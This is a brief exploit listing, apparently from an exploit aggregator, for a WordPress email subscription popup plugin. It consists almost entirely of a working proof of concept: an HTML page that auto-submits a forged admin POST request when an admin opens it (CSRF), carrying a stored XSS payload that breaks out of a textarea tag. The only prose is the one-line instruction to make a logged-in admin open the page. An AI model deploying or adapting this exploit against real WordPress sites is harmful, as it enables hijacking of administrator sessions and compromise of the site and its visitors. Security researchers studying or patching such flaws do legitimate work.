Share
## https://sploitus.com/exploit?id=WPEX-ID:58803934-DBD3-422D-88E7-EBBC5E8C0886
Make a logged in admin open

<html>
    <body onload="document.forms[0].submit()">
        <form action="https://example.com/wp-admin/admin.php?page=email_subscription_popup_subscribers_management" method="POST">
            <input type="hidden" name="action" value="sendEmailForm" />
            <input type="hidden" name="sendEmailQueue" value="1" />
            <input type="hidden" name="queueemails" value="</textarea><img src onerror=alert(/XSS/)>" />
            <input type="submit" value="Submit" />
        </form>
    </body>
</html>